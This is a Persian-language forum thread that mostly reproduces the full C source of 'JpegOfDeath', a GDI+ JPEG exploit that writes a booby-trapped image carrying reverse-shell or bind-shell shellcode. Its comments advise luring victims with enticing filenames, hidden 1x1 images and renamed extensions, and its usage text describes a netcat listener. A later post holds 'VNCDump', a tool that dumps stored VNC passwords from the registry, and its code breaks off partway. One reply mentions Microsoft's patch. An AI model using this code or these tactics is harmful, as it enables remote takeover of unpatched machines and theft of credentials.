Jpeg Bug

**!!!!!!!!!!!!!!!** · 2005-07-31, 07:58 AM

کد HTML:

 *
 * GDI+ JPEG Remote Exploit 
 *  By John Bissell A.K.A. HighT1mes
 *
 * Exploit Name:
 * =============
 *  JpegOfDeath.c v0.5
 *
 * Date Exploit Released:
 * ======================
 *  Sep, 23, 2004
 *
 * Description:
 * ============
 *  Exploit based on FoToZ exploit but kicks the exploit up 
 *  a notch by making it have reverse connectback as well as
 *  bind features that will work with all NT based OS's.
 *  WinNT, WinXP, Win2K, Win2003, etc... Thank you FoToz for
 *  helping get a grip on the situation. I actually had got
 *  bind jpeg exploit working earlier but I could only 
 *  trigger from OllyDbg due to the heap dynamically changing...
 *
 *  If anyone who uses this exploit has used my recent AIM 
 *  remote exploit then you will have a good idea already of how
 *  to use this exploit correctly.
 *
 *  Through my limited testing I have found on a unpatched 
 *  XP SP1 system that if you click the exploit jpeg file
 *  in Windows Explorer then you will be hacked. I know there
 *  are more attack points you can take advantage of if you
 *  look for them.. So say someone goes on any web browser
 *  and they decide to save your jpeg and then later open it
 *  in explorer.exe then they will be attacked.. or maybe they
 *  got a email that has a good filename attachment title to
 *  it like "daisey fuentes porn pic.jpg" well then they 
 *  want to see it so they save it to there harddrive and open
 *  the pic in explorer.exe and game over. You just have to
 *  test and get creative. The reason this is version 0.5 is
 *  because I know rundll32.exe is MAJORALLY exploitable and I know
 *  that would make this exploit far more powerful if I 
 *  figured that part out.. I have already exploited it
 *  personally myself but I need to run some more tests to
 *  make things final for everyone... On another side note
 *  for the people out there who think you can only be affected 
 *  through viewing or downloading a jpeg attachment.. you're
 *  dead wrong.. All the attacker has to do is simply change
 *  image extension from .jpg to .bmp or .tif or whatever
 *  and stupid Windows will still treat the file as a JPEG :-p...
 *  Also the fact is this vulnerability is exploitable 
 *  without the victim clicking a link... For instance you
 *  send them the image with a 1,1 width,height and then'
 *  they can't see it in Outlook Express, so there like 
 *  man this image has a cool name so I'll try to open the
 *  attachment, then there FUCKED... Well ok they have to
 *  click in a round-about-way.. but I'm sure if you're
 *  creative enough with all those MS features you can figure
 *  something out ;-)
 *
 *  I'll most likely be putting out another version of this
 *  exploit (more dangerous) once more testing has been done. So 
 *  I encourage everyone out there to download SP2, patch your
 *  Windows systems, etc... Of course this won't be a 
 *  cure all solution :-/
 *
 * Note:
 * =====
 *  If someone wants to take advantage of the bind mode of
 *  attack in this exploit you will need to set up a script
 *  on a web server to check everyone who downloads the 
 *  jpeg exploit file and then connect back to them on the
 *  port you wanted to use with the bind attack... One of
 *  the reasons I decided to keep the bind shellcode option
 *  in here is because sometimes as you people know a
 *  firewall will be more restrictive on outbound connections
 *  and there are times where a bind attack will do just right
 *  if the reverse connect attack won't work... On ANOTHER
 *  note you can also rename your jpeg file extension to
 *  something like a .bmp or .tif and dumb Windows program's
 *  (most of them) won't give give a shit and try to load the 
 *  jpeg anyways... You can easily trick unsuspecting people 
 *  this way.. which is pretty much everyone.. right??
 *
 * Greetings:
 * ==========
 *  FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
 *  Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
 *  Nick Fitzgerald, Adam Nance (where are you?),
 *  Santa Barbara, Jenna Jameson, John Kerry, so1o, 
 *  Computer Security Industry, Rom Hackers,  My chihuahuas
 *  (Rocky, Sailor, and Penny)...
 *
 *
 * Disclaimer:
 * ===========
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 * Look out for a better version of this exploit in a few days.. perhaps...
 *
 ********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

/* Exploit Data... */

char reverse_shellcode[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

char bind_shellcode[] =
"\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";

char setNOPs1[] =
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char setNOPs2[] =
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char header2[] =
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68";

/* Code... */

unsigned char xor_data(unsigned char byte)
{
	return(byte ^ 0x92);
}

void print_usage(char *prog_name)
{
	printf(" Exploit Usage:\n");
	printf("\t%s -r your_ip | -b [-p port] <jpeg_filename>\n\n", prog_name);
	printf(" Parameters:\n");
	printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t
and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or
-b then a bind\n\t\t\t\t attack will be generated.\n\n");
	printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t
used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind
then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode
is reverse connect  then the port you\n\t\t\t\t specify will be the one you want
to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n");
	printf(" Examples:\n");
	printf("\t%s -r 68.6.47.62 -p 8888 test.jpg\n", prog_name);
	printf("\t%s -b -p 1542 myjpg.jpg\n", prog_name);
	printf("\t%s -b whatever.jpg\n", prog_name);
	printf("\t%s -r 68.6.47.62 exploit.jpg\n\n", prog_name);
	printf(" Remember if you use the -r option to have netcat listening\n");
	printf(" on the port you are using for the attack so the victim will\n");
	printf(" be able to connect to you when exploited...\n\n");
	printf(" Example:\n");
	printf("\tnc.exe -l -p 8888");
	exit(-1);
}

int main(int argc, char *argv[])
{
	FILE *fout;
	unsigned int i = 0,j = 0;
	int raw_num = 0;
	unsigned long port = 1337; /* default port for bind and reverse attacks */
	unsigned long encoded_port = 0;
	unsigned long encoded_ip = 0;
	unsigned char attack_mode = 2; /* bind by default */
	char *p1 = NULL, *p2 = NULL;
	char ip_addr[256];
	char str_num[16];
	char jpeg_filename[256];
	WSADATA wsa;

	printf(" +------------------------------------------------+\n");
	printf(" |  JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
	printf(" |    Exploit by John Bissell A.K.A. HighT1mes    |\n");
	printf(" |              September, 23, 2004               |\n");
	printf(" +------------------------------------------------+\n");
	if (argc < 2)
		print_usage(argv[0]);

	/* process commandline */
	for (i = 0; i < (unsigned) argc; i++) {
		if (argv[i][0] == '-') {
			switch (argv[i][1]) {
			case 'r':
				/* reverse connect */
				strncpy(ip_addr, argv[i+1], 20);
				attack_mode = 1;
				break;
			case 'b':
				/* bind */
				attack_mode = 2;
				break;
			case 'p':
				/* port */
				port = atoi(argv[i+1]);
				break;
			}
		}
	}

	strncpy(jpeg_filename, argv[i-1], 255);
	fout = fopen(argv[i-1], "wb");
        
	if( !fout ) {
		printf("Error: JPEG File %s Not Created!\n", argv[i-1]);
		return(EXIT_FAILURE);
	}

	/* initialize the socket library */
	if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
		printf("Error: Winsock didn't initialize!\n");
		exit(-1);
	}

	encoded_port = htonl(port);
	encoded_port += 2;
	if (attack_mode == 1) {
		/* reverse connect attack */
		reverse_shellcode[184] = (char) 0x90;
     	reverse_shellcode[185] = (char) 0x92;
		reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
		reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));

		p1 = strchr(ip_addr, '.');
		strncpy(str_num, ip_addr, p1 - ip_addr);
		raw_num = atoi(str_num);
		reverse_shellcode[179] = xor_data((char)raw_num);

		p2 = strchr(p1+1, '.');
		strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
		raw_num = atoi(str_num);
		reverse_shellcode[180] = xor_data((char)raw_num);

		p1 = strchr(p2+1, '.');
		strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
		raw_num = atoi(str_num);
		reverse_shellcode[181] = xor_data((char)raw_num);

		p2 = strrchr(ip_addr, '.');
		strncpy(str_num, p2+1, 5);
		raw_num = atoi(str_num);
		reverse_shellcode[182] = xor_data((char)raw_num);
	}
	if (attack_mode == 2) {
		/* bind attack */ 
		bind_shellcode[204] = (char) 0x90;
     	bind_shellcode[205] = (char) 0x92;
		bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));
		bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));
	}

	/* build the exploit jpeg */
	j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
      
	for(i = 0; i < sizeof(header1) - 1; i++)
		fputc(header1[i], fout);
	for(i=0;i<sizeof(setNOPs1)-1;i++)
		fputc(setNOPs1[i], fout);
	for(i=0;i<sizeof(header2)-1;i++)
		fputc(header2[i], fout);
	for( i = j; i < 0x63c; i++) 
		fputc(0x90, fout);
		j = i;
	if (attack_mode == 1) {
		for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)
			fputc(reverse_shellcode[i], fout);
	}
	else if (attack_mode == 2) {
		for(i = 0; i < sizeof(bind_shellcode) - 1; i++)
			fputc(bind_shellcode[i], fout);
	}
	for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)
		fputc(0x90, fout); 
	for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)
		fputc(setNOPs2[j], fout);
        
	fprintf(fout, "\xFF\xD9");

	fcloseall();

	WSACleanup();

	printf("  Exploit JPEG file %s has been generated!\n", jpeg_filename);

	return(EXIT_SUCCESS);
}

**Hakimi** · 2005-07-31, 08:20 AM

و مایکروسافت از ماهها پیش، Security Update مربوط به این Bug را منتشر کرده است: http://www.microsoft.com/security/bu...0409_jpeg.mspx

**!!!!!!!!!!!!!!!** · 2005-07-31, 01:14 PM

نوشته اصلی توسط koorosh

و مایکروسافت از ماهها پیش، Security Update مربوط به این Bug را منتشر کرده است: http://www.microsoft.com/security/bu...0409_jpeg.mspx

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
من این source رو برای آشنایی دوستان با روند کارکرد این exploit گذاشتم نه برای موارد دیگه.
مورد بعد اینه که در 80% موارد اول Bug توسط افرادی غیر از تیم ماکروسافت پیدا میشه بعد مایکروسافت پچ میده در این مورد هم به همین شکل بود. حالا من نفهمیدم جریان اون کلمه ماهها پیش که شما به کار بردین چه معنی میده !!!؟

**!!!!!!!!!!!!!!!** · 2005-08-01, 07:40 AM

کد HTML:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void main(int argc,char *argv[])
{
	HKEY key;
	HKEY key2;
	unsigned char buffer[8];
	unsigned char buffer2[8];
	unsigned char port[16];
	unsigned char port2[32];
	unsigned long PSize2 = sizeof(port2);
	unsigned long PSize = sizeof(port);
	unsigned long size = sizeof(buffer);
	unsigned long size2 = sizeof(buffer2);
	printf("\tVNCDump By KD-Team\n");
	FILE *VFile;
	VFile = fopen("vnclog.txt","a+");
	if(ERROR_SUCCESS == RegOpenKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\ORL\\WinVNC3",0,KEY_ALL_ACCESS,&key))
	{
		printf("Opening Key \"HKCU\" succeded\n");
		printf("Handle: %i\n",key);
	}
	else
	{
		printf("Opening Key Failed\n");
		RegCloseKey(key);
	}

	if(ERROR_SUCCESS == RegQueryValueEx(key,"Password",NULL,0,buffer,&size))//(LPBYTE)
	{
		printf("Quering Key succeded\n");
		printf("HKCU Password\n");
		fprintf(VFile,"%s","HKCU\n");
		fprintf(VFile,"%s","Password: ");
		for(int length = 0; length < sizeof(buffer); length++)
		{
			printf("%x", buffer[length]);
			fprintf(VFile,"%x",buffer[length]);
		}
		fprintf(VFile,"%s","\n");
		memset(&buffer,0,sizeof(buffer));
		printf("\n");

		if(ERROR_SUCCESS == RegQueryValueEx(key,"PortNumber",NULL,0,port,&PSize))//(LPBYTE)
		{
			printf("Quering Key succeded\n");
			printf("HKCU PortNumber\n");
			fprintf(VFile,"%s","HKCU\n");
			fprintf(VFile,"%s","PortNumber: ");
			for(int length = strlen(port); length >= 0 ; length--)
			{
				printf("%x", port[length]);
				fprintf(VFile,"%x",port[length]);
			}
			fprintf(VFile,"%s","\n");
			fclose(VFile);
			RegCloseKey(key);
		}
		else
		{
			printf("Quering Key Failed\n");
			RegCloseKey(key);
		}
	}
	else
	{
		printf("Quering Key Failed\n");
		RegCloseKey(key);
	}
//**********************************************************************************************************
	VFile = fopen("vnclog.txt","a+");
	if(ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\ORL\\WinVNC3\\Default",0,KEY_ALL_ACCESS,&key2))
	{
		printf("\nOpening Key \"HKLM\" succeded\n");
		printf("Handle: %i\n",key2);
	}
	else
	{
		printf("Opening Key Failed\n");
		RegCloseKey(key2);
	}

	if(ERROR_SUCCESS == RegQueryValueEx(key2,"Password",NULL,0,buffer2,&size2))//(LPBYTE)
	{
		printf("Quering Key succeded\n");
		printf("HKLM Password\n");
		fprintf(VFile,"%s","HKLM\n");
		fprintf(VFile,"%s","Password: ");
		for(int length2 = 0; length2 < sizeof(buffer2); length2++)
		{
			printf("%x", buffer2[length2]);
			fprintf(VFile,"%x",buffer2[length2]);
		}
		fprintf(VFile,"%s","\n");
		memset(&buffer2,0,sizeof(buffer2));
		printf("\n");
		if(ERROR_SUCCESS == RegQueryValueEx(key2,"PortNumber",NULL,0,port2,&PSize2))//(LPBYTE)
		{
			printf("Quering Key succeded\n");
			printf("HKLM PortNumber\n");
			fprintf(VFile,"%s","HKLM\n");
			fprintf(VFile,"%s","PortNumber: ");
			for(int length2 = strlen(port2); length2 >= 0 ; length2--)
			{
				printf("%x", port2[length2]);
				fprintf(VFile,"%x",port2[length2]);
			}
			fprintf(VFile,"%s","\n");
			fclose(VFile);
			RegCloseKey(key2);
		}
		else
		{
			printf("Quering Key Failed\n");
			RegCloseKey(key2);
		}
	}
	else
	{
		printf("Quering Key Failed\n");
